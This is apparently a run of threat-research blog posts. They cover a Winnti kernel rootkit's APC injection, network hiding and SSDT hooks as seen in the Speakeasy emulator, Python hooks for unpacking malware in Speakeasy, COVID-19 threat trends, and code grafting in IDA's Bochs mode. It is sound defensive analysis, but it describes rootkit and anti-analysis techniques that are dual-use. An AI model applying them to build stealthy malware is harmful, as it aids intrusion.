Once the exported functions are resolved, the rootkit is ready to inject the user mode DLL component. Next, the malware manually copies the in-memory DLL into the services.exe process address space. These memory write events are captured and shown in Figure 6.

Figure 6: Memory write events captured while copying the user mode implant into services.exe

A common technique that rootkits use to execute user mode code involves a Windows feature known as Asynchronous Procedure Calls (APC). APCs are functions that execute asynchronously within the context of a supplied thread. Using APCs allows kernel mode applications to queue code to run within a thread’s user mode context. Malware often wants to inject into user mode since much of the common functionality (such as network communication) within Windows can be more easily accessed. In addition, by running in user mode, there is less risk of being detected in the event of faulty code bug-checking the entire machine.

In order to queue an APC to fire in user mode, the malware must locate a thread in an “alertable” state. Threads are said to be alertable when they relinquish their execution quantum to the kernel thread scheduler and notify the kernel that they are able to dispatch APCs. The malware searches for threads within the services.exe process and once it detects one that’s alertable it will allocate memory for the DLL to inject then queue an APC to execute it.

Speakeasy emulates all kernel structures involved in this process, specifically the executive thread object (ETHREAD) structures that are allocated for every thread on a Windows system. Malware may attempt to grovel through this opaque structure to identify when a thread’s alertable flag is set (and therefore a valid candidate for an APC). Figure 7 shows the memory read event that was logged when the Winnti malware manually parsed an ETHREAD structure in the services.exe process to confirm it was alertable. At the time of this writing, all threads within the emulator present themselves as alertable by default.

Figure 7: Event logged when the tcprelay.sys malware confirmed a thread was alertable

Next, the malware can execute any user mode code it wants using this thread object. The undocumented functions KeInitializeApc and KeInsertQueueApc will initialize and execute a user mode APC respectively. Figure 8 shows the API set that the malware uses to inject a user mode module into the services.exe process. The malware executes a shellcode stub as the target of the APC that will then execute a loader for the injected DLL. All of this can be recovered from the memory dump package and analyzed later.

Figure 8: Logged APIs used by tcprelay.sys rootkit to inject into user mode via an APC

Network Hooks

After injecting into user mode, the kernel component will attempt to install network obfuscation hooks (presumably to hide the user mode implant). Speakeasy tracks and tags all memory within the emulation space. In the context of kernel mode emulation, this includes all kernel objects (e.g. Driver and Device objects, and the kernel modules themselves). Immediately after we observe the malware inject its user mode implant, we see it begin to attempt to hook kernel components. This was confirmed during static analysis to be used for network hiding.

The memory access section of the emulation report reveals that the malware modified the netio.sys driver, specifically code within the exported function named NsiEnumerateObjectsAllParametersEx. This function is ultimately called when a user on the system runs the “netstat” command and it is likely that the malware is hooking this function in order to hide connected network ports on the infected system. This inline hook was identified by the event captured in Figure 9.

Figure 9: Inline function hook set by the malware to hide network connections

In addition, the malware hooks the Tcpip driver object in order to accomplish additional network hiding. Specifically, the malware hooks the IRP_MJ_DEVICE_CONTROL handler for the Tcpip driver. User mode code may send IOCTL codes to this function when querying for active connections. This type of hook can be easily identified with Speakeasy by looking for memory writes to critical kernel objects as shown in Figure 10.

Figure 10: Memory write event used to hook the Tcpip network driver

System Service Dispatch Table Hooks

Finally, the rootkit will attempt to hide itself using the nearly ancient technique of system service dispatch table (SSDT) patching. Speakeasy allocates a fake SSDT so malware can interact with it. The SSDT is a function table that exposes kernel functionality to user mode code. The event in Figure 11 shows that the SSDT structure was modified at runtime.

Figure 11: SSDT hook detected by Speakeasy

If we look at the malware in IDA Pro, we can confirm that the malware patches the SSDT entry for the ZwQueryDirectoryFile and ZwEnumerateKey APIs that it uses to hide itself from file system and registry analysis. The SSDT patch function is shown in Figure 12.

Figure 12: File hiding SSDT patching function shown in IDA Pro

After setting up these hooks, the system thread will exit. The other entry points (such as the IRP handlers and DriverUnload routines) in the driver are less interesting and contain mostly boilerplate driver code.

Acquiring the Injected User Mode Implant

Now that we have a good idea what the driver does to hide itself on the system, we can use the memory dumps created by Speakeasy to acquire the injected DLL discussed earlier. Opening the zip file we created at emulation time, we can find the memory tag referenced in Figure 6. We quickly confirm the memory block has a valid PE header and it successfully loads into IDA Pro as shown in Figure 13.

Figure 13: Injected user mode DLL recovered from Speakeasy memory dump

Conclusion

In this blog post, we discussed how Speakeasy can be effective at automatically identifying rootkit activity from the kernel mode binary. Speakeasy can be used to quickly triage kernel binaries that may otherwise be difficult to dynamically analyze. For more information and to check out the code, head over to our GitHub repository.

Using Speakeasy Emulation Framework Programmatically to Unpack Malware

Threat Research

James T. Bennett

1 December 2020 at 20:30

Andrew Davis recently announced the public release of his new Windows emulation framework named Speakeasy. While the introductory blog post focused on using Speakeasy as an automated malware sandbox of sorts, this entry will highlight another powerful use of the framework: automated malware unpacking. I will demonstrate, with code examples, how Speakeasy can be used programmatically to:

Bypass unsupported Windows APIs to continue emulation and unpacking
Save virtual addresses of dynamically allocated code using API hooks
Surgically direct execution to key areas of code using code hooks
Dump an unpacked PE from emulator memory and fix its section headers
Aid in reconstruction of import tables by querying Speakeasy for symbolic information

Initial Setup

One approach to interfacing with Speakeasy is to create a subclass of Speakeasy’s Speakeasy class. Figure 1 shows a Python code snippet that sets up such a class that will be expanded in upcoming examples.

import speakeasy

class MyUnpacker(speakeasy.Speakeasy):
def __init__(self, config=None):
super(MyUnpacker, self).__init__(config=config)

Figure 1: Creating a Speakeasy subclass

The code in Figure 1 accepts a Speakeasy configuration dictionary that may be used to override the default configuration. Speakeasy ships with several configuration files. The Speakeasy class is a wrapper class for an underlying emulator class. The emulator class is chosen automatically when a binary is loaded based on its PE headers or is specified as shellcode. Subclassing Speakeasy makes it easy to access, extend, or modify interfaces. It also facilitates reading and writing stateful data before, during, and after emulation.

Emulating a Binary

Figure 2 shows how to load a binary into the Speakeasy emulator.

self.module = self.load_module(filename)

Figure 2: Loading the binary into the emulator

The load_module function returns a PeFile object for the provided binary on disk. It is an instance of the PeFile class defined in speakeasy/windows/common.py, which is subclassed from pefile’s PE class. Alternatively, you can provide the bytes of a binary using the data parameter rather than specifying a file name. Figure 3 shows how to emulate a loaded binary.

self.run_module(self.module)

Figure 3: Starting emulation

API Hooks

The Speakeasy framework ships with support for hundreds of Windows APIs with more being added frequently. This is accomplished via Python API handlers defined in appropriate files in the speakeasy/winenv/api directory. API hooks can be installed to have your own code executed when particular APIs are called during emulation. They can be installed for any API, regardless of whether a handler exists or not. An API hook can be used to override an existing handler and that handler can optionally be invoked from your hook. The API hooking mechanism in Speakeasy provides flexibility and control over emulation. Let’s examine a few uses of API hooking within the context of emulating unpacking code to retrieve an unpacked payload.

Bypassing Unsupported APIs

When Speakeasy encounters an unsupported Windows API call, it stops emulation and provides the name of the API function that is not supported. If the API function in question is not critical for unpacking the binary, you can add an API hook that simply returns a value that allows execution to continue. For example, a recent sample’s unpacking code contained API calls that had no effect on the unpacking process. One such API call was to GetSysColor. In order to bypass this call and allow execution to continue, an API hook may be added as shown in Figure 4.

self.add_api_hook(self.getsyscolor_hook,
'user32',
'GetSysColor',
argc=1
)

Figure 4: Adding an API hook

According to MSDN, this function takes 1 parameter and returns an RGB color value represented as a DWORD. If the calling convention for the API function you are hooking is not stdcall, you can specify the calling convention in the optional call_conv parameter. The calling convention constants are defined in the speakeasy/common/arch.py file. Because the GetSysColor return value does not impact the unpacking process, we can simply return 0. Figure 5 shows the definition of the getsyscolor_hook function specified in Figure 4.

def getsyscolor_hook(self, emu, api_name, func, params):
return 0

Figure 5: The GetSysColor hook returns 0

If an API function requires more finessed handling, you can implement a more specific and meaningful hook that suits your needs. If your hook implementation is robust enough, you might consider contributing it to the Speakeasy project as an API handler!

Adding an API Handler

Within the speakeasy/winenv/api directory you'll find usermode and kernelmode subdirectories that contain Python files for corresponding binary modules. These files contain the API handlers for each module. In usermode/kernel32.py, we see a handler defined for SetEnvironmentVariable as shown in Figure 6.

1: @apihook('SetEnvironmentVariable', argc=2)
2: def SetEnvironmentVariable(self, emu, argv, ctx={}):
3:     '''
4:     BOOL SetEnvironmentVariable(
5:         LPCTSTR lpName,
6:         LPCTSTR lpValue
7:         );
8:     '''
9:     lpName, lpValue = argv
10:    cw = self.get_char_width(ctx)
11:    if lpName and lpValue:
12:        name = self.read_mem_string(lpName, cw)
13:        val = self.read_mem_string(lpValue, cw)
14:        argv[0] = name
15:        argv[1] = val
16:        emu.set_env(name, val)
17:    return True

Figure 6: API handler for SetEnvironmentVariable

A handler begins with a function decorator (line 1) that defines the name of the API and the number of parameters it accepts. At the start of a handler, it is good practice to include MSDN's documented prototype as a comment (lines 3-8).

The handler's code begins by storing elements of the argv parameter in variables named after their corresponding API parameters (line 9). The handler's ctx parameter is a dictionary that contains contextual information about the API call. For API functions that end in an ‘A’ or ‘W’ (e.g., CreateFileA), the character width can be retrieved by passing the ctx parameter to the get_char_width function (line 10). This width value can then be passed to calls such as read_mem_string (lines 12 and 13), which reads the emulator’s memory at a given address and returns a string.

It is good practice to overwrite string pointer values in the argv parameter with their corresponding string values (lines 14 and 15). This enables Speakeasy to display string values instead of pointer values in its API logs. To illustrate the impact of updating argv values, examine the Speakeasy output shown in Figure 7. In the VirtualAlloc entry, the symbolic constant string PAGE_EXECUTE_READWRITE replaces the value 0x40. In the GetModuleFileNameA and CreateFileA entries, pointer values are replaced with a file path.

KERNEL32.VirtualAlloc(0x0, 0x2b400, 0x3000, "PAGE_EXECUTE_READWRITE") -> 0x7c000
KERNEL32.GetModuleFileNameA(0x0, "C:\\Windows\\system32\\sample.exe", 0x104) -> 0x58
KERNEL32.CreateFileA("C:\\Windows\\system32\\sample.exe", "GENERIC_READ", 0x1, 0x0, "OPEN_EXISTING", 0x80, 0x0) -> 0x84

Figure 7: Speakeasy API logs

Saving the Unpacked Code Address

Packed samples often use functions such as VirtualAlloc to allocate memory used to store the unpacked sample. An effective approach for capturing the location and size of the unpacked code is to first hook the memory allocation function used by the unpacking stub. Figure 8 shows an example of hooking VirtualAlloc to capture the virtual address and amount of memory being allocated by the API call.

1: def virtualalloc_hook(self, emu, api_name, func, params):
2:     '''
3:     LPVOID VirtualAlloc(
4:        LPVOID lpAddress,
5:        SIZE_T dwSize,
6:        DWORD flAllocationType,
7:        DWORD flProtect
8:      );
9:     '''
10:    PAGE_EXECUTE_READWRITE = 0x40
11:    lpAddress, dwSize, flAllocationType, flProtect = params
12:    rv = func(params)
13:    if lpAddress == 0 and flProtect == PAGE_EXECUTE_READWRITE:
14:        self.logger.debug("[*] unpack stub VirtualAlloc call, saving dump info")
15:        self.dump_addr = rv
16:        self.dump_size = dwSize

17: return rv

Figure 8: VirtualAlloc hook to save memory dump information

The hook in Figure 8 calls Speakeasy’s API handler for VirtualAlloc on line 12 to allow memory to be allocated. The virtual address returned by the API handler is saved to a variable named rv. Since VirtualAlloc may be used to allocate memory not related to the unpacking process, additional checks are used on line 13 to confirm the intercepted VirtualAlloc call is the one used in the unpacking code. Based on prior analysis, we’re looking for a VirtualAlloc call that receives the lpAddress value 0 and the flProtect value PAGE_EXECUTE_READWRITE (0x40). If these arguments are present, the virtual address and specified size are stored on lines 15 and 16 so they may be used to extract the unpacked payload from memory after the unpacking code is finished. Finally, on line 17, the return value from the VirtualAlloc handler is returned by the hook.

Surgical Code Emulation Using API and Code Hooks

Speakeasy is a robust emulation framework; however, you may encounter binaries that have large sections of problematic code. For example, a sample may call many unsupported APIs or simply take far too long to emulate. An example of overcoming both challenges is described in the following scenario.

Unpacking Stubs Hiding in MFC Projects

A popular technique used to disguise malicious payloads involves hiding them inside a large, open-source MFC project. MFC is short for Microsoft Foundation Class, which is a popular library used to build Windows desktop applications. These MFC projects are often arbitrarily chosen from popular Web sites such as Code Project. While the MFC library makes it easy to create desktop applications, MFC applications are difficult to reverse engineer due to their size and complexity. They are particularly difficult to emulate due to their large initialization routine that calls many different Windows APIs. What follows is a description of my experience with writing a Python script using Speakeasy to automate unpacking of a custom packer that hides its unpacking stub within an MFC project.

Reverse engineering the packer revealed the unpacking stub is ultimately called during initialization of the CWinApp object, which occurs after initialization of the C runtime and MFC. After attempting to bypass unsupported APIs, I realized that, even if successful, emulation would take far too long to be practical. I considered skipping over the initialization code completely and jumping straight to the unpacking stub. Unfortunately, execution of the C-runtime initialization code was required in order for emulation of the unpacking stub to succeed.

My solution was to identify a location in the code that fell after the C-runtime initialization but was early in the MFC initialization routine. After examining the Speakeasy API log shown in Figure 9, such a location was easy to spot. The graphics-related API function GetDeviceCaps is invoked early in the MFC initialization routine. This was deduced based on 1) MFC is a graphics-dependent framework and 2) GetDeviceCaps is unlikely to be called during C-runtime initialization.

0x43e0a7: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e0e3: 'kernel32.DecodePointer(0x7049)' -> 0x7048
0x43b16a: 'KERNEL32.HeapSize(0x4130, 0x0, 0x7000)' -> 0x90
0x43e013: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02a: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02c: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e068: 'kernel32.EncodePointer(0x44e215)' -> 0x44e216
0x43e013: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02a: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02c: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e068: 'kernel32.EncodePointer(0x704c)' -> 0x704d
0x43c260: 'KERNEL32.LeaveCriticalSection(0x466f28)' -> None
0x422151: 'USER32.GetSystemMetrics(0xb)' -> 0x1
0x422158: 'USER32.GetSystemMetrics(0xc)' -> 0x1
0x42215f: 'USER32.GetSystemMetrics(0x2)' -> 0x1
0x422169: 'USER32.GetSystemMetrics(0x3)' -> 0x1
0x422184: 'GDI32.GetDeviceCaps(0x288, 0x58)' -> None

Figure 9: Identifying beginning of MFC code in Speakeasy API logs

To intercept execution at this stage I created an API hook for GetDeviceCaps as shown in Figure 10. The hook confirms the function is being called for the first time on line 2.

1: def mfc_init_hook(self, emu, api_name, func, params):
2:     if not self.trigger_hit:
3:         self.trigger_hit = True
4:         self.h_code_hook =   self.add_code_hook(self.start_unpack_func_hook)
5:         self.logger.debug("[*] MFC init api hit, starting unpack function")

Figure 10: API hook set for GetDeviceCaps

Line 4 shows the creation of a code hook using the add_code_hook function of the Speakeasy class. Code hooks allow you to specify a callback function that is called before each instruction that is emulated. Speakeasy also allows you to optionally specify an address range for which the code hook will be effective by specifying begin and end parameters.

After the code hook is added on line 4, the GetDeviceCaps hook completes and, prior to the execution of the sample's next instruction, the start_unpack_func_hook function is called. This function is shown in Figure 11.

1: def start_unpack_func_hook(self, emu, addr, size, ctx):
2:     self.h_code_hook.disable()
3:     unpack_func_va = self.module.get_rva_from_offset(self.unpack_offs) + self.module.get_base()
4:     self.set_pc(unpack_func_va)

Figure 11: Code hook that changes the instruction pointer

The code hook receives the emulator object, the address and size of the current instruction, and the context dictionary (line 1). On line 2, the code hook disables itself. Because code hooks are executed with each instruction, this slows emulation significantly. Therefore, they should be used sparingly and disabled as soon as possible. On line 3, the hook calculates the virtual address of the unpacking function. The offset used to perform this calculation was located using a regular expression. This part of the example was omitted for the sake of brevity.

The self.module attribute was previously set in the example code shown in Figure 2. It being subclassed from the PE class of pefile allows us to access useful functions such as get_rva_from_offset() on line 3. This line also includes an example of using self.module.get_base() to retrieve the module's base virtual address.

Finally, on line 4, the instruction pointer is changed using the set_pc function and emulation continues at the unpacking code. The code snippets in Figure 10 and Figure 11 allowed us to redirect execution to the unpacking code after the C-runtime initialization completed and avoid MFC initialization code.

Dumping and Fixing Unpacked PEs

Once emulation has reached the original entry point of the unpacked sample, it is time to dump the PE and fix it up. Typically, a hook would save the base address of the unpacked PE in an attribute of the class as illustrated on line 15 of Figure 8. If the unpacked PE does not contain the correct entry point in its PE headers, the true entry point may also need to be captured during emulation. Figure 12 shows an example of how to dump emulator memory to a file.

with open(self.output_path, "wb") as up:
mm = self.get_address_map(self.dump_addr)
up.write(self.mem_read(mm.get_base(), mm.get_size()))

Figure 12: Dumping the unpacked PE

If you are dumping a PE that has already been loaded in memory, it will not have the same layout as it does on disk due to differences in section alignment. As a result, the dumped PE's headers may need to be modified. One approach is to modify each section's PointerToRawData value to match its VirtualAddress field. Each section's SizeOfRawData value may need to be padded in order conform with the FileAlignment value specified in the PE’s optional headers. Keep in mind the resulting PE is unlikely to execute successfully. However, these efforts will allow most static analysis tools to function correctly.

The final step for repairing the dumped PE is to fix its import table. This is a complex task deserving of its own blog post and will not be discussed in detail here. However, the first step involves collecting a list of library function names and their addresses in emulator memory. If you know the GetProcAddress API is used by the unpacker stub to resolve imports for the unpacked PE, you can call the get_dyn_imports function as shown in Figure 13.

api_addresses = self.get_dyn_imports()

Figure 13: Retrieving dynamic imports

Otherwise, you can query the emulator class to retrieve its symbol information by calling the get_symbols function as shown in Figure 14.

symbols = self.get_symbols()

Figure 14: Retrieve symbol information from emulator class

This data can be used to discover the IAT of the unpacked PE and fix or reconstruct its import related tables.

Putting It All Together

Writing a Speakeasy script to unpack a malware sample can be broken down into the following steps:

Reverse engineer the unpacking stub to identify: 1) where the unpacked code will reside or where its memory is allocated, 2) where execution is transferred to the unpacked code, and 3) any problematic code that may introduce issues such as unsupported APIs, slow emulation, or anti-analysis checks.
If necessary, set hooks to bypass problematic code.
Set a hook to identify the virtual address and, optionally, the size of the unpacked binary.
Set a hook to stop emulation at, or after, execution of the original entry point of the unpacked code.
Collect virtual addresses of Windows APIs and reconstruct the PE’s import table.
Fix the PE’s headers (if applicable) and write the bytes to a file for further analysis.

For an example of a script that unpacks UPX samples, check out the UPX unpacking script in the Speakeasy repository.

Conclusion

The Speakeasy framework provides an easy-to-use, flexible, and powerful programming interface that enables analysts to solve complex problems such as unpacking malware. Using Speakeasy to automate these solutions allows them to be performed at scale. I hope you enjoyed this introduction to automating the Speakeasy framework and are inspired to begin using it to implement your own malware analysis solutions!

Limited Shifts in the Cyber Threat Landscape Driven by COVID-19

Threat Research

Sandra Joyce

8 April 2020 at 16:15

Though COVID-19 has had enormous effects on our society and economy, its effects on the cyber threat landscape remain limited. For the most part, the same actors we have always tracked are behaving in the same manner they did prior to the crisis. There are some new challenges, but they are perceptible, and we—and our customers—are prepared to continue this fight through this period of unprecedented change.

The significant shifts in the threat landscape we are currently tracking include:

The sudden major increase in a remote workforce has changed the nature and vulnerability of enterprise networks.
Threat actors are now leveraging COVID-19 and related topics in social engineering ploys.
We anticipate increased collection by cyber espionage actors seeking to gather intelligence on the crisis.
Healthcare operations, related manufacturing, logistics, and administration organizations, as well as government offices involved in responding to the crisis are increasingly critical and vulnerable to disruptive attacks such as ransomware.
Information operations actors have seized on the crisis to promote narratives primarily to domestic or near-abroad audiences.

Same Actors, New Content

The same threat actors and malware families that we observed prior to the crisis are largely pursuing the same objectives as before the crisis, using many of the same tools. They are simply now leveraging the crisis as a means of social engineering. This pattern of behavior is familiar. Threat actors have always capitalized on major events and crises to entice users. Many of the actors who are now using this approach have been tracked for years.

Ultimately, COVID-19 is being adopted broadly in social engineering approaches because it is has widespread, generic appeal, and there is a genuine thirst for information on the subject that encourages users to take actions when they might otherwise have been circumspect. We have seen it used by several cyber criminal and cyber espionage actors, and in underground communities some actors have created tools to enable effective social engineering exploiting the coronavirus pandemic. Nonetheless, COVID-19 content is still only used in two percent of malicious emails.

For the time being, we do not believe this social engineering will be abetting. In fact, it is likely to take many forms as changes in policy, economics, and other unforeseen consequences manifest. Recently we predicted a spike in stimulus related social engineering, for example. Additionally, the FBI has recently released a press release anticipating a rise in COVID-19 related Business Email Compromise (BEC) scams.

State Actors Likely Very Busy

Given that COVID-19 is the undoubtedly the overwhelming concern of governments worldwide for the time being, we anticipated targeting of government, healthcare, biotech, and other sectors by cyber espionage actors. We have not yet observed an incident of cyber espionage targeting COVID-19 related information; however, it is often difficult to determine what information these actors are targeting. There has been at least one case reported publicly which we have not independently confirmed.

We have seen state actors, such as those from Russia, China and North Korea, leverage COVID-19 related social engineering, but given wide interest in that subject, that does not necessarily indicate targeting of COVID-19 related information.

Threat to Healthcare

Though we have no reason to believe there is a sudden, elevated threat to healthcare, the criticality of these systems has probably never been greater, and thus the risk to this sector will be elevated throughout this crisis. The threat of disruption is especially disconcerting as it could affect the ability of these organizations to provide safe and timely care. This threat extends beyond hospitals to pharmaceutical companies, as well as manufacturing, administration and logistics organizations providing vital support. Additionally, many critical public health resources lie at the state and local level.

Though there is some anecdotal evidence suggesting some ransomware actors are avoiding healthcare targets, we do not expect that all actors will practice this restraint. Additionally, an attack on state and local governments, which have been a major target of ransomware actors, could have a disruptive effect on treatment and prevention efforts.

Remote Work

The sudden and unanticipated shift of many workers to work from home status will represent an opportunity for threat actors. Organizations will be challenged to move quickly to ensure sufficient capacity, as well as that security controls and policies are in place. Disruptive situations can reduce morale and increase stress, leading to adverse behavior such as decreasing users’ reticence to open suspicious messages, and even increasing the risk of insider threats. Distractions while working at home can cause lowered vigilance in scrutinizing and avoiding suspicious content as workers struggle to balance work and home responsibilities at the same time. Furthermore, the rapid adoption of platforms will undoubtedly lead to security mistakes and attract the attention of the threat actors.

Secure remote access will likely rely on use of VPNs and user access permissions and authentication procedures intended to limit exposure of proprietary data. Hardware and infrastructure protection should include ensuring full disk encryption on enterprise devices, maintaining visibility on devices through an endpoint security tool, and maintaining regular software updates.

For more on this issue, see our blog post on the risks associated with remote connectivity.

The Information Operations Threat

We have seen information operations actors promote narratives associated with COVID-19 to manipulate primarily domestic or near-abroad audiences. We observed accounts in Chinese-language networks operating in support of the People's Republic of China (PRC), some of which we previously identified to be promoting messaging pertaining to the Hong Kong protests, shift their focus to praising the PRC's response to the COVID-19 outbreak, criticizing the response of Hong Kong medical workers and the U.S. to the pandemic, and covertly promoting a conspiracy theory that the U.S. was responsible for the outbreak of the coronavirus in Wuhan.

We have also identified multiple information operations promoting COVID-19-related narratives that were aimed at Russian- and Ukrainian-speaking audiences, including some that we assess with high confidence are part of the broader suspected Russian influence campaign publicly referred to as "Secondary Infektion," as well as other suspected Russian activity. These operations have included leveraging a false hacktivist persona to spread the conspiracy theory that the U.S. developed the coronavirus in a weapons laboratory in Central Asia, taking advantage of physical protests in Ukraine to push the narrative that Ukrainians repatriated from Wuhan will infect the broader Ukrainian population, and claiming that the Ukrainian healthcare system is ill-equipped to deal with the pandemic. Other operations alleged that U.S. government or military personnel were responsible for outbreaks of the coronavirus in various countries including Lithuania and Ukraine, or insisted that U.S. personnel would contribute to the pandemic's spread if scheduled multilateral military exercises in the region were to continue as planned.

Outlook

It is clear that adversaries expect us to be distracted by these overwhelming events. The greatest cyber security challenge posed by COVID-19 may be our ability to stay focused on the threats that matter most. An honest assessment of the cyber security implications of the pandemic will be necessary to make efficient use of resources limited by the crisis itself.

For more information and resources that can help strengthen defenses, visit FireEye's "Managing Through Change and Crisis" site, which aggregates many resources to help organizations that are trying to navigate COVID-19 related security challenges.

Thinking Outside the Bochs: Code Grafting to Unpack Malware in Emulation

Threat Research

Michael Bailey

7 April 2020 at 16:00

This blog post continues the FLARE script series with a discussion of patching IDA Pro database files (IDBs) to interactively emulate code. While the fastest way to analyze or unpack malware is often to run it, malware won’t always successfully execute in a VM. I use IDA Pro’s Bochs integration in IDB mode to sidestep tedious debugging scenarios and get quick results. Bochs emulates the opcodes directly from your IDB in a Bochs VM with no OS.

Bochs IDB mode eliminates distractions like switching VMs, debugger setup, neutralizing anti-analysis measures, and navigating the program counter to the logic of interest. Alas, where there is no OS, there can be no loader or dynamic imports. Execution is constrained to opcodes found in the IDB. This precludes emulating routines that call imported string functions or memory allocators. Tom Bennett’s flare-emu ships with emulated versions of these, but for off-the-cuff analysis (especially when I don’t know if there will be a payoff), I prefer interactively examining registers and memory to adjust my tactics ad hoc.

What if I could bring my own imported functions to Bochs like flare-emu does? I’ve devised such a technique, and I call it code grafting. In this post I’ll discuss the particulars of statically linking stand-ins for common functions into an IDB to get more mileage out of Bochs. I’ll demonstrate using this on an EVILNEST sample to unpack and dump next-stage payloads from emulated memory. I’ll also show how I copied a tricky call sequence from one IDB to another IDB so I could keep the unpacking process all in a single Bochs debug session.

EVILNEST Scenario

My sample (MD5 hash 37F7F1F691D42DCAD6AE740E6D9CAB63 which is available on VirusTotal) was an EVILNEST variant that populates the stack with configuration data before calling an intermediate payload. Figure 1 shows this unusual call site.

Figure 1: Call site for intermediate payload

The code in Figure 1 executes in a remote thread within a hollowed-out iexplore.exe process; the malware uses anti-analysis tactics as well. I had the intermediate payload stage and wanted to unpack next-stage payloads without managing a multi-process debugging scenario with anti-analysis. I knew I could stub out a few function calls in the malware to run all of the relevant logic in Bochs. Here’s how I did it.

Code Carving

I needed opcodes for a few common functions to inject into my IDBs and emulate in Bochs. I built simple C implementations of selected functions and compiled them into one binary. Figure 2 shows some of these stand-ins.

Figure 2: Simple implementations of common functions

I compiled this and then used IDAPython code similar to Figure 3 to extract the function opcode bytes.

Figure 3: Function extraction

I curated a library of function opcodes in an IDAPython script as shown in Figure 4. The nonstandard function opcodes at the bottom of the figure were hand-assembled as tersely as possible to generically return specific values and manipulate the stack (or not) in conformance with calling conventions.

Figure 4: Extracted function opcodes

On top of simple functions like memcpy, I implemented a memory allocator. The allocator referenced global state data, meaning I couldn’t just inject it into an IDB and expect it to work. I read the disassembly to find references to global operands and templatize them for use with Python’s format method. Figure 5 shows an example for malloc.

Figure 5: HeapAlloc template code

I organized the stubs by name as shown in Figure 6 both to call out functions I would need to patch, and to conveniently add more function stubs as I encounter use cases for them. The mangled name I specified as an alias for free is operator delete.

Figure 6: Function stubs and associated names

To inject these functions into the binary, I wrote code to find the next available segment of a given size. I avoided occupying low memory because Bochs places its loader segment below 0x10000. Adjacent to the code in my code segment, I included space for the data used by my memory allocator. Figure 7 shows the result of patching these functions and data into the IDB and naming each location (stub functions are prefixed with stub_).

Figure 7: Data and code injected into IDB

The script then iterates all the relevant calls in the binary and patches them with calls to their stub implementations in the newly added segment. As shown in Figure 8, IDAPython’s Assemble function saved the effort of calculating the offset for the call operand manually. Note that the Assemble function worked well here, but for bigger tasks, Hex-Rays recommends a dedicated assembler such as Keystone Engine and its Keypatch plugin for IDA Pro.

Figure 8: Abbreviated routine for assembling a call instruction and patching a call site to an import

The Code Grafting script updated all the relevant call sites to resemble Figure 9, with the target functions being replaced by calls to the stub_ implementations injected earlier. This prevented Bochs in IDB mode from getting derailed when hitting these call sites, because the call operands now pointed to valid code inside the IDB.

Figure 9: Patched operator new() call site

Dealing with EVILNEST

The debug scenario for the dropper was slightly inconvenient, and simultaneously, it was setting up a very unusual call site for the payload entry point. I used Bochs to execute the dropper until it placed the configuration data on the stack, and then I used IDAPython’s idc.get_bytes function to extract the resulting stack data. I wrote IDAPython script code to iterate the stack data and assemble push instructions into the payload IDB leading up to a call instruction pointing to the DLL’s export. This allowed me to debug the unpacking process from Bochs within a single session.

I clicked on the beginning of my synthesized call site and hit F4 to run it in Bochs. I was greeted with the warning in Figure 10 indicating that the patched IDB would not match the depictions made by the debugger (which is untrue in the case of Bochs IDB mode). Bochs faithfully executed my injected opcodes producing exactly the desired result.

Figure 10: Patch warning

I watched carefully as the instruction pointer approached and passed the IsDebuggerPresent check. Because of the stub I injected (stub_IsDebuggerPresent), it passed the check returning zero as shown in Figure 11.

Figure 11: Passing up IsDebuggerPresent

I allowed the program counter to advance to address 0x1A1538, just beyond the unpacking routine. Figure 12 shows the register state at this point which reflects a value in EAX that was handed out by my fake heap allocator and which I was about to visit.

Figure 12: Running to the end of the unpacker and preparing to view the result

Figure 13 shows that there was indeed an IMAGE_DOS_SIGNATURE (“MZ”) at this location. I used idc.get_bytes() to dump the unpacked binary from the fake heap location and saved it for analysis.

Figure 13: Dumping the unpacked binary

Through Bochs IDB mode, I was also able to use the interactive debugger interface of IDA Pro to experiment with manipulating execution and traversing a different branch to unpack another payload for this malware as well.

Conclusion

Although dynamic analysis is sometimes the fastest road, setting it up and navigating minutia detract from my focus, so I’ve developed an eye for routines that I can likely emulate in Bochs to dodge those distractions while still getting answers. Injecting code into an IDB broadens the set of functions that I can do this with, letting me get more out of Bochs. This in turn lets me do more on-the-fly experimentation, one-off string decodes, or validation of hypotheses before attacking something at scale. It also allows me to experiment dynamically with samples that won’t load correctly anyway, such as unpacked code with damaged or incorrect PE headers.

I’ve shared the Code Grafting tools as part of the flare-ida GitHub repository. To use this for your own analyses:

In IDA Pro’s IDAPython prompt, run code_grafter.py or import it as a module.
Instantiate a CodeGrafter object and invoke its graftCodeToIdb() method:
- CodeGrafter().graftCodeToIdb()
Use Bochs in IDB mode to conveniently execute your modified sample and experiment away!

This post makes it clear just how far I’ll go to avoid breaking eye contact with IDA. If you’re a fan of using Bochs with IDA too, then this is my gift to you. Enjoy!

Social Engineering Based on Stimulus Bill and COVID-19 Financial Compensation Schemes Expected to Grow in Coming Weeks

Threat Research

FireEye Mandiant Threat Intelligence

27 March 2020 at 19:00

Given the community interest and media coverage surrounding the economic stimulus bill currently being considered by the United States House of Representatives, we anticipate attackers will increasingly leverage lures tailored to the new stimulus bill and related recovery efforts such as stimulus checks, unemployment compensation and small business loans. Although campaigns employing themes relevant to these matters are only beginning to be adopted by threat actors, we expect future campaigns—primarily those perpetrated by financially motivated threat actors—to incorporate these themes in proportion to the media’s coverage of these topics.

Threat actors with varying motivations are actively exploiting the current pandemic and public fear of the coronavirus and COVID-19. This is consistent with our expectations; malicious actors are typically quick to adapt their social engineering lures to exploit major flashpoints along with other recurrent events (e.g. holidays, Olympics). Security researchers at FireEye and in the broader community have already begun to identify and report on COVID-19 themed campaigns with grant, payment, or economic recovered themed emails and attachments.

Example Malware Distribution Campaign

